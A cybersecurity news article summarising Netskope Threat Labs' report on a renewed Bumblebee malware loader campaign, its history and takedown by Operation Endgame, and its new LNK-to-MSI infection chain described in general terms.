The Bumblebee malware loader could have re-emerged months after Europol-led Operation Endgame disrupted it in May 2024.
A new infection chain which deploys Bumblebee malware has been uncovered in a new report from Netskope Threat Labs.
This is the first occurrence of a Bumblebee campaign since Operation Endgame, a law enforcement operation performed by Europol and partners in May 2024 which disrupted major malware botnets.
The Netskope report also points to other research corroborating a possible Bumblebee return.
Background on Bumblebee
Bumblebee is a sophisticated malware loader that cybercriminal groups have actively used to distribute various types of malware, such as ransomware, infostealers, and other malicious payloads.
Google’s Threat Analysis Group (TAG) first discovered the malware in March 2022 and named it Bumblebee based on a user-agent string it used.
Bumblebee replaced other popular loaders like BazarLoader and TrickBot, which were heavily used in ransomware campaigns.
It has been linked to several ransomware groups, including Conti, Quantum, and MountLocker, all of which use it as part of their initial access strategy for deploying ransomware.
Bumblebee disappeared from the cyber threat landscape in late 2023 before re-emerging in February 2024.
Three months later, its infrastructure was taken down by Europol alongside other loaders’, including IcedID, SystemBC, Pikabot, Smokeloader and Trickbot.
Bumblebee’s New Infection Chain
The infection chain detected by Netskope likely starts via a phishing email luring the victim to download a ZIP file and extract and execute the file inside it.
The ZIP file contains an LNK file named “Report-41952.lnk” that, once executed, starts a chain of events to download and execute the final Bumblebee payload in memory, avoiding the need to write the DLL on disk, as observed in previous campaigns.
The usage of LNK files is common in Bumblebee campaigns, either to download the next stage payloads or to directly execute files. In this case, the file is used as a downloader and is responsible for downloading and executing the next stage of the infection chain.
Once opened, the LNK file executes a Powershell command to download a Microsoft Installer (MSI) file from a remote server, renames it as ‘%AppData%\y.msi’ and then executes/installs it using the Microsoft msiexec.exe tool.
The use of MSI files to execute payloads is a successful technique several adversaries, such as DarkGate and Latrodectus, regularly use.
However, this is the first time it has been seen being used to deploy Bumblebee, Leandro Fróes, the author of the Netskope report, said.
In the case of this new infection, the analyzed samples are disguised as Nvidia and Midjourney installers. They are used to load and execute the final payload all in memory, without even having to drop the payload to disk, as observed in previous campaigns using ISO files.